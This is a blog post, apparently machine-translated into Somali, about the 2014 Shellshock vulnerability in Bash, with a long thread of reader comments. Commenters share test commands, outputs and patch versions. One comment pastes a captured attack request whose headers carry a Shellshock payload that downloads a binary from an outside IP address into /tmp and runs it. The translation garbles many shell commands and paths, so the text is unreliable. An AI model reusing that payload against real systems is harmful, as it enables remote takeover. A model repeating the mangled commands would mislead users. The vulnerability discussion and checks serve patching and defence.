Waxay u socotaa sida dabka baloogyada qaarkood, shey war lagu daabacay blog amniga de Red Hat ku saabsan nuglaanta laga helay Bash sababtoo ah si xun u adeegsiga isbeddelada adduunka. Sida laga soo xigtay warka asalka ah:
“Vulne Jilicsanaanta waxaa sabab u ah in doorsoomayaasha deegaanka oo leh qiyam si gaar ah loo farsameeyay la abuuri karo ka hor inta aan la wicin qolofta bashka Isbeddelayaashani waxay ka koobnaan karaan lambar la fulinayo isla marka qolofta la soo waco. Magaca doorsoomayaashaan la sharaxay micno malahan, kaliya waxyaabaha ay ka kooban yihiin. Natiijo ahaan, u nuglaantaan waxaa lagu soo bandhigey xaalado badan, tusaale ahaan:
- Xoog amar waxaa loo adeegsadaa qaabeynta sshd si loo siiyo awooda fulinta amarka xaddidan ee isticmaalayaasha fog. Cilladan waxaa loo isticmaali karaa in looga fogaado taas oo ay u bixiso amarka aan loo meeldayin. Qaar ka mid ah hirgelinta Git iyo Subversion waxay adeegsadaan Shell-yada xaddidan. Isticmaalka joogtada ah ee 'OpenSSH' saameyn kuma yeesho maadaama dadka isticmaala ay mar horeba heli karaan konsole.
- Apache server-ka iyadoo la adeegsanayo mod_cgi ama mod_cgid waa la saameynayaa haddii qoraallada CGI lagu qoro labadaba bash, ama spawn sublevels. Noocyada noocan oo kale ah ayaa si toos ah loogu adeegsadaa nidaamka / popen ee C, by os.system / os.popen ee Python, haddii la adeegsanayo nidaamka / fulinta qolofka 'PHP' (markaad ku socoto qaabka CGI), iyo furitaanka / nidaamka ku jira Perl (taas oo kuxiran xariga amarka).
- Qoraallada PHP ee ay la socdaan mod_php saameyn kuma yeelan doonaan xitaa haddii la ciyaaro sublevels.
- Macaamiisha DHCP waxay u yeerayaan qoraallo qolof leh si ay u qaabeeyaan nidaamka, iyagoo leh qiimayaal laga soo qaatay server-ka khatarta badan leh Tani waxay u oggolaaneysaa amarrada sharci-darrada ah in lagu fuliyo, badanaa asal ahaan, mashiinka macmiilka DHCP.
- Daemons kala duwan iyo barnaamijyo leh mudnaanta SUID waxay ku fulin karaan qoraallo qolof leh qiyamka isbeddelka bey'adda ee dejiya / saameyn ku yeeshay isticmaalaha, kaas oo u oggolaan lahaa amarrada aan sharciga ahayn in lagu fuliyo
- Codsi kasta oo kale oo ku dhegan qolof ama socodsiiya qoraalo qolof ah sida u adeegsiga bash turjubaan ahaan. Qoraallada Shell ee aan dhoofinta doorsoomayaasha u nugul dhibaatadan, xitaa haddii ay ka baaraandegaan waxyaabaha aan la aaminin oo ay ku keydsadaan doorsoomayaasha qolof (bidix) iyo sublevels furan.
... "
Sidee loo ogaadaa haddii bashkaygu uu saameynayo?
Marka tan la eego, waxaa jira dariiq aad u fudud oo lagu ogaan karo haddii ay nuglaansho na soo gaadhay. Xaqiiqdii, waxaan ku tijaabiyay Antergos-kayga sida muuqata wax dhibaato ah kuma qabo. Waxa inala gudboon waa inaan furno terminal oo aan dhigno:
env x = '() {:;}; echo nugul 'bash -c "echo tani waa tijaabo"
Haddii ay sidan ku timaaddo wax dhibaato ah ma hayno:
env x = '() {:;}; echo nugul 'bash -c "echo kani waa tijaabo" bash: digniin: x: iska indha tirid qeexida shaqada isku day bash: qalad keenista qeexida shaqada ee "x' tani waa tijaabo
Haddii natiijadu ka duwan tahay, waxaad u baahan kartaa inaad isticmaasho wadiiqooyinka cusbooneysiinta ee qeybinnada aan doorbidnay si aad u ogaato haddii ay mar horeba codsadeen balastarka. Marka waad ogtahay 😉
La cusbooneysiiyay: Tani waa wax soo saarka ka soo baxa shaqaale iyada oo la adeegsanayo Ubuntu 14: 04:
env x = '() {:;}; echo nugul 'bash -c "echo tani waa tijaabo" nugul tani waa tijaabo
Sida aad u aragto, illaa hadda waa mid nugul.
Waxaan haystaa Kubuntu 14.04 laga bilaabo 64 waxaanan sidoo kale helayaa:
env x = '() {:;}; echo nugul 'bash -c "echo tani waa tijaabo"
nugul
tani waa tijaabo
Hore ayaan u cusbooneysiiyay, laakiin ma saxna. Maxaa la sameeyaa
Sug inta ay cusbooneysiinayaan. Horeba eOS tusaale ahaan waa la cusbooneysiiyay .. 😀
Sidee yaab leh, waxaan sidoo kale haystaa Kubuntu 14.04
$ env x = '() {:;}; echo nugul 'bash -c "echo tani waa tijaabo"
bash: digniin: x: iska indhatirka isku day qeexida shaqada
bash: qalad soo dejinta qeexida shaqada ee `` x ''
tani waa tijaabo
Waxaan ku darayaa nooca xirmada "bash" ee maanta la soo dejiyey inuu yahay:
4.3-7ubuntu 1.1
http://packages.ubuntu.com/trusty/bash
Xaaladdayda, bixinta amarka, waxay i siineysaa waxyaabaha soo socda ee ku yaal terminal:
>Sikastaba, kaftanka ayaa ah inaan cusbooneysiiyay Debian Wheezy waana taas tan i daadisay.
Wheezy weli waa u nugul yahay qaybta labaad ee cayayaanka, ugu yaraan galabtii (UTC -4: 30) dhibaatadu wali way soo socota: /
Waxaan kaliya cadeeyay kadib markaan dalbaday cusbooneysiin saakay midkoodna Slackware ama Debian ama Centos ma saameynayaan maadaama ay heleen casriyeyn u dhiganta.
Maxaa Ubuntu wali ka dhigaya mid nugul saacaddan? Oo ii sheeg inay amaan tahay: D.
Laakiin miyaad isku dayday cusbooneysiinta Ubuntu?
Cusboonaysiinta maanta iyaguna way hagaajiyeen.
OK
Khubarada amniga ayaa ka digaya nuglaanta 'Bash', waxay khatar weyn ku keeni kartaa dadka isticmaala Software-ka Linux marka loo eego bugta Heartbleed, halkaasoo 'haakarisku' ay uga faa'iideysan karaan cilad ku jirta Bash si ay ula wareegto gebi ahaanba nidaamka.
Tod Beardsley, oo ah maamule injineernimo ee shirkadda amniga internetka ee Rapid7, ayaa ka digay in cilladda lagu qiimeeyay 10 darrankeeda, taasoo la micno ah inay leedahay saameynta ugu badan, waxaana lagu qiimeeyay "hooseeya" kakanaanta ka faa'iideysiga, taasoo la micno ah taas oo si fudud ugu fudud 'weerarada' hacker ' . Iyagoo adeegsanaya nuglaanshahan, weeraryahannadu waxay awood u yeelan karaan inay gacanta ku dhigaan nidaamka qalliinka, helaan macluumaad qarsoodi ah, isbeddello ku sameeyaan, iwm, ”ayay tiri Beardsley. "Qof kasta oo nidaam leh oo haysta Bash waa inuu si dhaqso leh u adeegsadaa balastarka," ayuu raaciyay.
KA HOR INTAAN LACAG LA'AAN OO SOO BANDHIGAY QALABKII LOOGU TALAGALAY (GNU) ee lagu marti geliyo Bach, waxay ku habboonaan laheyd barnaamijka 'Linux Software' si looga takhaluso GNU loona beddelo aaladda BSD.
PS: ha CAYRISINA xorriyadayda hadalka, ... ha caayin cidna, ... ha u tirtirin farriintayda sidii farriintii hore ee la iga tirtiray!.
Oh fadlan ha ka badin. Sideen u necbahay dadkaas isticmaala BSD oo quudhsada GNU, Linux ama waxkastoo mashruucyadan ah.
Waan kula socdaa runtiina waad saxantahay sida darnaanta godkaan.
Ma ahayn faaf-reeb, waxay ahayd shaqo-ka-fadhiis (waxaad isla faallo ka bixisay gnome 3.14 post)
«… Oo lagu qiimeeyay 'LOW' BILAASHKA kakooban ee ka faa'iideysiga, taas oo macnaheedu yahay inay si fudud ugu fududahay weerarada haakariska»
Isweydaarsiga ma la ogaan karaa?
Sidee ayey u fududaan kartaa ka faa'iideysiga nuglaanta isla markaana isla markaa leh heer "hooseeya" khatar ah maxaa yeelay way adag tahay in la isticmaalo?
Waa cillad lagu xaliyay saacado gudahood kulanka iyo in, sida qalbi furan, aysan lahayn warbixinno sheegaya in laga faa'iidaystay (Dabcan, kani wuxuu haystaa waqti yar oo isbarasho ah).
Waa saxaafad tabloid badan khatarta dhabta ah.
@Staff ma waxay kuu muuqataa mid aan muhiim kuu ahayn? Maxaad ii sheegi doontaa hadda?
HEL./.HTTP/1.0
.User-Wakiilka: Mahadsanid-Rob
.Kookie: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.Host: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.Referer: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
Aqbal :. * / *
$ fayl nginx
nginx: ELF 32-bit LSB la fulin karo, Intel 80386, nooca 1 (SYSV), xiriir ahaan xiriir la leh, GNU / Linux 2.6.18, waa lagala baxay
$md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$ sha256sum nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
Ma ogtahay waxa ay tahay Wax yar oo khatar ah ...
Xaaladda waa mid aad u culus, laakiin halkaa laga bilaabo in la yiraahdo waa inaad joojisaa isticmaalka bash ee xulashada BSD, horeyba waa ugu badnaan, si kasta oo cusbooneysiintu horeyba way u jirtay, kaliya waan taabanayaa cusbooneysiinta iyo wax kale.
Hadda PD, waxaan u maleynayaa inuu ka badanyahay jaalka @robet, uma maleynayo in halkaan ay maamulladu naftooda u hurayaan inay tirtiraan faallooyinka sidaas oo kale ah sababtoo ah haa, maxaa yeelay, tan iyo markii aan kaqeybqaatay bulshadaan waxaan dareemay dareenkaas waxaana rajeynayaa inay sidaa sii ahaato jidka.
Thanks.
Waxaad ku dhejineysaa faallo isku mid ah laba qoraal oo kala duwan. Haddii aad isku dayeyso inaad kor u qaaddo "isha" sheekada, raali ahow, meeshu meeshu maaha.
Bash wuxuu ka yimaadaa Unix (iyo iskuxidhka GNU). Nidaamyada ku saleysan BSD sida OSX sidoo kale waa la saameeyaa, sida laga soo xigtay Genbeta, weli ma aysan dhejin. Sidoo kale, si aad u hesho Bash waxaad u baahan tahay koonto isticmaale, mid maxalli ama SSH.
@Shaqaalaha:
1.- Waxaa loo qoondeeyay Heerka 10 (heerka ugu badan ee halista) sababo la xiriira xaddiga adeegyada ay saameyn karto cayayaanka. Qoraalka ugu weyn waxay ka dhigayaan xaqiiqdaas mid aad u cad, iyagoo ku doodaya in cayayaanka uu saameyn ku yeelan karo adeegyada sida apache, sshd, barnaamijyada leh ogolaanshaha suid (xorg, iyo kuwa kale).
2.- Waxaa loo kala saaraa inay tahay Heerka Dhibaatada Hoose, markay tahay hirgelinteeda, tusaalaha ugu fiican ee tani waa qoraalka tijaabada nuglaanta ee @elav uu dhigay boostada. Aad ayey u adagtahay in la hirgaliyo maahan, sida aad arki karto.
Uma arko hoos u dhaca macluumaadka (kaliya waxaan arkaa turjumaad Google ah) iyo haddii dhibaatadu ay aad u daran tahay, oo sidaad u sheegto, horeyba waxay u leedahay balastar iyo xal, laakiin taas maahan, hadda khatar ma aha, waana mid dhab ah .
@petercheco / @Yukiteru
Si khaldan ha ii fasirin, waxaan u maleynayaa inay iska cadahay in dhaliilteydu tahay wararka ku saabsan in Robet uu isku xidhayo oo uu diiradda saarayo wax aan fiicnayn oo aan loo baahnayn.
Si la mid ah, waa inaan kala saarno halista iyo halista (ma xusin tan dambe), waxaan inta badan u adeegsannaa isku macno, laakiin halkan, halistu waxay noqon doontaa awoodda waxyeellada ee cayayaanka iyo halista suurtagalnimada inay dhacdo.
Xaaladdayda gaarka ah, waxaan soo galay shalay. Ma ahayn liisaska dirista ama wax la mid ah. Waxay u ahayd desktop distro! Taleefanka ayaan qabtay oo fariin ayaan u diray sysadmin-ka isaga oo isku xiraya waxaanan xaqiijiyay in wax walba la i dhajiyay, markaa iga raali noqo laakiin warkaasi igama dhigayo inaan soo jeedo.
Fagaarayaasha kale waxay ku xusayaan nuglaanta Bash, "xalka ay Debian iyo Ubuntu sii daayeen", laakiin maanta waxay ogaadeen in nuglaansho wali jirto, marka xalka ma dhameystirneyn, intaas ayey ku sheegeen!
Waxaan u arkaa in qaar badani igu dhaleeceeyeen xaqiiqda fudud ee dadka looga hor istaagayo darnaanta nuglaanta - oo loo qalmo heerka 10 ee halista ugu badan, iyo sheegista xalalka suurtagalka ah ee Software-ka Linux kahor qalabkii gaboobay ee GNU ee Bash lagu martigeliyey -oo si fiican GNU u kari kara laguugu beddelo aaladda BSD ee ku jirta barnaamijka Linux Software, also sidoo kale waxaan isticmaalaa Linux oo aan jecelahay Linux!
Waxaan cadeynayaa in Bash uusan ku imaan si asal ah oo lagu rakibay BSD, waa xirmo kale oo la jaanqaadaya Linux oo lagu rakibi karo BSD ... haa!. Iyo isha ayaa loo dhigay si ay u hubiyaan wararka, maaddaama qaar badan oo ka mid ah dadka isticmaala mararka qaarkood aysan rumaysanayn farriinta ama faallooyinka.
robet: Sidii ay horeyba kuugu sheegeen marar badan, mar hore ayaad faallooyinkaaga ku dartay warka boostada, uma baahnid inaad ku qorto qoraal kasta oo aad wax ka dhiibato.
On bash, waxaa jira qolof kale oo loo isticmaali karo haddii ay dhacdo in Bash uu nugul yahay. 😉
Robet, in aan ogahay in aysan jirin softiweer isku daraya kernel-ka linux iyo isticmaalaha BSD. Waxa ugu dhow ayaa ah dhinaca kale, kBSD + GNU, sida Gentoo iyo Debian sameeyaan. Ka sokow, GNU (1983) lama oran karin "waayeel hore" haddii ay tahay ka dib BSD (1977). Labaduba waxay wadaagaan xididkooda unix (laakiin koodhka ma ahan), ma jiri doono "iswaafajin Linux" ah haddii Bash la abuuray markii Linus T uu weli cunug ahaa.
uff, baaritaanka debian-ka ee xilligan waa "mid nugul" waxa xiriir ah oo aan hayno ...
Waxaan isticmaalaa Tijaabinta Debian oo xitaa laantan waxaan ka helnay casriyeynta bash
marka loo eego genbeta waxaa kale oo jira u nuglaansho kale
http://seclists.org/oss-sec/2014/q3/685
amarka in lala tashado waa
env X = '() {(a) => \' sh -c "echo nugul"; bash -c "echo Guuldaro 2 aan la xiriirin"
env X = '() {(a) => \' sh -c "echo nugul"; bash -c "echo Guuldaradii Fashilmay 2" sh: X: sadarka 1: qalad farsamo ahaaneed oo udhow cunsur aan la filayn : u nugul: amarka lama helin Guul-darrada 1 aan xoqinisla aniga
Isla halkaan. Laakiin cayayaanka asalka ah ee boostada ayaa lagu dhajiyay (L) Ubuntu 14.04
Halkii aan ka sameyn lahaa echo fudud, iskuday inaad ka dhigto inay fuliso tilmaam u baahan mudnaan, waxaan tuurayaa "mudnaanta aan ku filnayn" ... cayayaankani ma kordhinayo mudnaanta? Haddii aysan kordhinin mudnaanta markaa ma ahan mid khatar ah sida ay u rinjiyeeyaan.
Waad saxantahay !! waxay ahaayeen laba nugul ...
Aniga ahaan Linux Mint 17 ka dib cusbooneysiintii labaad ee ugu dambeysay ee ay ku dhejiyeen bakhaarradii Ubuntu xalay, markay fuliyaan amarka qolofku wuxuu bixiyaa wax soo saarkan:
env X = '() {(a) => \' sh -c "echo nugul"; bash -c "echo Guuldaro 2 aan la xiriirin"
>
Nooca "bassh" ee lagu dhejiyay bakhaarrada Ubuntu si loo cusbooneysiiyo kuwii hore waa:
4.3-7ubuntu 1.2
Nidaamyada laga soo qaatay Debian waxaad ku hubin kartaa nooca lagu rakibay amarkan:
dpkg -s bash | Nooca grep
Si kastaba xaalku ha ahaadee, waa in la caddeeyaa, ugu yaraan adeegsadayaasha Debian, Ubuntu iyo Mint; Waa inaadan aad uga walwalsaneyn barnaamijyada ku socda qoraalada cinwaanka #! / Bin / sh sababtoo ah qeybintaas / bin / sh ma wacayo "bash", laakiin waxay ku xiran tahay qolofka "dash" (dash waa :)
Debian Alchemist Console (dash) waa qalab kontorool POSIX ah
dambaska.
.
Maaddaama ay fuliso qoraallo ka dhakhso badan bash, oo leh ku-tiirsanaan yar
maktabadaha (taas oo ka dhigaysa mid aad u adag oo ka dhan ah cilladaha software-ka ama
qalabka), waxaa loo isticmaalaa inuu yahay qalabka kombiyuutarka caadiga ah ee nidaamyada
Debian
Marka, ugu yaraan Ubuntu, "bash" waxaa loo isticmaalaa sidii qolof loogu talagalay soo galitaanka isticmaalaha (sidoo kale adeegsadaha xididka). Laakiin isticmaale kasta ayaa isticmaali kara qolof kale asal ahaan adeegsadaha iyo qalabka wax lagu xidho (terminals).
Way fududahay in la hubiyo in qolofka fuliya qoraallada (#! / Bin / sh) adoo fulinaya amarradan:
faylka / bin / sh
(wax soo saarku waa / bin / sh: xiriir astaan u leh 'dash') waxaan raacnaa raad soo celinta ku celcelinta amarka
fayl / bin / dash
(wax soo saarku waa / bin / dash: ELF 64-bit LSB shay la wadaago, x86-64, nooca 1 (SYSV) markaa kani waa mid la fulin karo.
Kuwani waa natiijooyinka ku saabsan qaybinta Linux Mint 17. Qaybaha kale ee aan ahayn Ubuntu / Debian-ku-saleysan way kala duwanaan karaan.
Ma aha wax adag in la beddelo qolofka asalka ah !! xitaa waxaad u isticmaali kartaa mid ka duwan kan isticmaalayaasha iyo isticmaalaha xididka. Xaqiiqdii waa inaad rakibtaa qolofka aad dooratay oo aad ugu badashaa qaabka uguhooseeya amarka "chsh" ama adoo tafatirka faylka / iwm / passwd (in kasta oo dadka isticmaala ee aan garanayn cawaaqibka qaladka markay fayl gareeyaan "passwd" faylka, waa Way kafiican tahay inay iyagu sifiican isu sheegaan kahor intaanay tafatirin, nuqul ka sameeynin asalka haddii ay lagama maarmaan noqoto in laga soo kabto).
Waxaan dareemayaa raaxo badan "tcsh" (tcsh is :)
TENEX C console-ka, oo ah nooc ka soo wanaagsanaaday Bershley csh
"Csh" waa waxa loo isticmaalo Mac OS X dhawr sano ka hor. Wax macquul ah oo tixgelinaya in badan oo ka mid ah nidaamka hawlgalka Apple uu yahay lambarka 'FreeBSD'. Hadda wixii aan akhriyay shalay, waxay umuuqataa inay iyaguna bixiyaan "bash" oo loogu talagalay boosteejooyinka isticmaalaha.
Gunaanad:
- Noocyada "bash" ee la duubay "ee loogu talagalay qaybinta ugu isticmaalka badan" horay ayaa loo qaybiyey
- "bash" nooca 4.3-7ubuntu1.2 oo hadhowna kama koobna cayayaankaas
- Ma aha qasab in lagu isticmaalo "bash" OS * Linux
- In yar * Qaybinta Linux ayaa xiriirisa #! / Bin / sh oo leh "bash"
- Waxaa jira waxyaabo kale: ash, dash, csh, tcsh iyo qaar kaloo badan
- Ma aha wax dhib ah in la beddelo qolofta caadiga ah ee nidaamku u yeero markii la furayo boosteejada
- Qalab yar oo yar (router-yada iyo kuwa kale) ayaa adeegsada "bash", maxaa yeelay aad buu u weyn yahay !!
Hadda hadda cusbooneysiin kale ayaa timid oo rakibaysa nooc kale oo ah "bash" 4.3-7ubuntu1.3
Wixii Linux Mint 17 iyo Ubuntu 14.04.1 LTS
ArchLinux waxay soo gashay nooca bash-4.3.026-1
@ Xurxo… .csh oo laga keenay Berkeley?,… Waxaad wax ka fahantay waxa aan kor ku hadlayo, waxaana fiican inaad isticmaasho BSD “csh”… halkii aad ka isticmaali lahayd qalabkii hore ee GNU ee Bash lagu martiqaaday. Qalabkani waa midka ugu fiican Software-ka Linux.
Waxaan u maleynayaa in tani ay tahay cayayaanka
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760
run?
Xalkuse muxuu noqon lahaa?
Sug iyaga inay ku cusbooneysiiyaan xirmada dushaada 😉
Cayayaanka waxaa loo baabtiisay sidii duqeyn
http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/
nugul
tani waa tijaabo
Weli lama baarin Ubuntu Studio 14.04
Lagu dayactiray Ubuntu Studio 14.04.1
wisp @ ubuntustudio: ~ $ env x = '() {:;}; echo nugul 'bash -c "echo tani waa tijaabo"
bash: digniin: x: iska indhatirka isku day qeexida shaqada
bash: qalad soo dejinta qeexida shaqada ee `` x ''
tani waa tijaabo
Xaqiiqdii waa nuglaansho yar, haddii ay ku saameyso waa inaad khalad hore u sameyn jirtay ...
Sababtoo ah qoraalka bash ee ku shaqeeya mudnaanta aasaasiga ah waa in aan waligiis loo soo bandhigin isticmaale. Hadana haddii aad maamusho adiga oo aan mudnaan lahayn, ma jirto u nuglaansho noocan oo kale ah. Dhab ahaantii, waa doqonimo. Feejignaan badan.
Waxaan u maleynayaa isku mid.
Dhab ahaan, si loo iibiyo wargeysyo badan ama aad u hesho booqashooyin badan, cayayaankaani way fiican yihiin.
Laakiin waxay had iyo jeer iloobaan inay sheegaan in si kumbuyuutar loogu waxyeeleeyo qoraallada noocan oo kale ah, waa inaad marka hore marin u yeelatid bash ka dibna loo yeeshaa xidid ahaan.
shaqaalaha haddii aad u isticmaashid cufan leh cgi, kaliya geli cinwaanka 'http' cinwaannada 'cookies' ama 'referer' hawsha aad rabto inaad fuliso. Xitaa waxaa loo isticmaalay in lagu faafiyo gooryaanka.
iyo haddii qof qolof u dhigto server leh wget mishell.php, haddii ay sidaas dhacdo halis ma aha, waa sidaas?
Kula heshiiyo. Waxaan u maleynayay inay tahay cayayaan aad u weyn sida kan Qalbidhagax (xitaa NSA-da ayaa isku amaahday inay sii huriso cudurka), laakiin ka dib waxay noqotay cayayaan yar.
Waxaa jira cayayaanka kale oo runtii halis ah sida isticmaalka waalida ah ee Flash iyo gaabiska ku yimaada waxqabadka Pepper Flash Player, iyo midka horeyba loo hagaajiyay webRTC bug ee Chrome iyo Firefox.
Ma ogtahay haddii ay leedahay qorshe loogu talagalay dadka leh Linux Mint 16?
Tijaabinta Debian horayba waa loo hagaajiyay.
5-ta diro waa la xaliyay, OS X-kayga ma aqaan.
Fadlan ha faafreebin faaladayda, waxaan idhi OS X. Ma garanayo haddii aad ku odhan karto OS X boggan.
@yoyo sifiican haku dhaafin inbadan waxay wali kushaqeynayaan faahfaahinta balastarka ... iskuday tan kadibna ii sheeg, soco XD
env x = '() {:;}; echo nugul 'bash -c "echo waan ka nuglahay iphone 6 trash"
Taasi haddii ay haystaan waxay xalliyeen 100% kahor OS X waxaan sharad ku furayaa wax kasta
Hagaag, xitaa Ars Technica waxay siiyaan ku xirnaanshaha Bash ee OSX.
@Yoyo faallada xigta ee OS X ee SPAM .. lla tu badbaadi .. 😛
@yoyo halkaa si aad u hagaajiso xigashooyinka ... laakiin inta kale waad ogtahay 😉
FSF ayaa hadashay
https://fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability
Sidii oo kale waxay noqdeen kuwo la shaqeeya OSX (maxaa yeelay OSX wali waxay isticmaashaa Bash: v).
Sikastaba, maahan inaan wax badan isku qaldo Debian Jessie.
Haddii nidaamku u nugul yahay Cent OS:
yum nadiifi dhamaan && yum update bash
si aad u aragto nooca bash:
rpm -qa | salaax bash
Haddii nooca uu ka weyn yahay bash-4.1.2-15.el6_5.1 nidaamkaaga ayaa nugul!
Thanks.
Dayacanka 2aad wali lama xalin
env amvariable2 = '() {(a) => \' sh -c "echo amVulnerable"; bash -c "echo Guuldaro 2 lama xiriirin"
Cusbooneysiin ...
Ka soo horjeedka igu dhaca aniga Gentoo, kaliya waxaan u nugul ahay guuldarada koowaad laakiin tan labaad waxaan tan ku helayaa:
[koodh] sh: X: sadarka 1: cilad farsameysan oo udhow cunsur lama filaan ah '='
sh: X: sadarka 1: '' '
sh: qalad soo dejinta qeexitaanka shaqada ee `` X ''
sh: nugul: amar lama helin
Cayayaanka 2 lama dhajin
[/ code]
Ma aqaano haddii ay hore u jiri doonto nooc deggan oo Bash ah oo cayayaanka la hagaajinayo, laakiin si kasta oo ay u sugi doonto waqtiga soo socda ee aan sameeyo soo bixitaan –sync && emerge –atabat –deep –with-bdeps = iyo –newuse @world (waa sidaas Tallaabada waxaan cusbooneysiiyaa nidaamka oo dhan).
Waxaan hayaa Gentoo leh nooc 4.2_p50 ah ilaa iminkana way ka gudubtay dhammaan imtixaannadii. Isku day inaad soo baxdo –sync ka dibna soo baxdo -av1 app-shells / bash, ka dibna hubi inaad haysato nooca 4.2_p50 adoo isticmaalaya amarka bash –version.
Miyaad tan isku dayday?
Iyo xirmooyin cusub, tijaabo cusub oo ay bixisay Red Hat
cd / tmp; rm -f / tmp / echo; env 'x = () {(a) => \' bash -c "taariikhda echo"; bisad / tmp / echo
haddii nidaamkeenu uusan nugul ahayn oo si sax ah loo dhajiyay, waa inuu na siiyaa wax sidan oo kale ah
1 taariikhda
2 bisad: / tmp / echo: Faylka ama galka ma jiro
Isku day sidan:
env X = '() {(a) => \' sh -c "echo nugul"; bash -c "echo Failure 2 patched"
Waan Helay
nugul
Cayayaanka 2 dhejiyay
Iska ilow, khadka si xun ayaa loo qaabeeyey.
Hore ayaan u cusbooneysiiyay slackware-kayga, mahadsanid!
Haye, waxaan qabaa su'aal, waxaan hayaa dhowr server oo leh "SUSE Linux Enterprise Server 10" 64 jajab.
Markii aan fuliyo amarrada waan nuglahay, xitaa waan ka nuglahay qashinka iPhone 6 xD
Haddaanan khaldanayn cusbooneysiinta / rakibidda xirmooyinka SUSE waxaa lagu sameeyaa amarka «zypper».
Qaar ka mid ah server-yada waxay ii sheegaysaa tan:
BIAL: ~ # zypper kor
-bash: zypper: amar lama helin
BIAL: ~ #
Iyo kuwa kale tan:
SMB: ~ # zypper kor
Soo celinta ilaha nidaamka…
Kordhinta metadata ee SUSE Linux Enterprise Server 10 SP2-20100319-161944…
Kala bixinta xogta RPM ...
Soo koobid:
Wax la sameeyo.
Maxaan sameeyaa
Waan ogahay inay qaar dhahaan nuglaanta way ka yartahay tan ay rinjiyeeyaan, laakiin waan hayaa mana doonayo inaan khatar la kulmo, ha yaraado ama ha weynaato.
Thanks.
Fiid wanaagsan, waxaan isku dayay inaan dhajiyo koodhka aad ku dhiibtay maqaalka, tan ayaan helayaa
sanders @ pc-sanders: ~ $ env x = '() {:;}; echo nugul 'bash -c "echo tani waa tijaabo"
tani waa tijaabo
sanders @ pc-sanders: ~ $
Fadlan miyaad ii sharixi laheyd sida loo dhajiyo qalabka 'distro', maalin walba waan cusbooneysiiyaa mana arko wax isbedel ah oo ku yimaada wax soo saarka degdega ah.
Waad ku mahadsan tahay!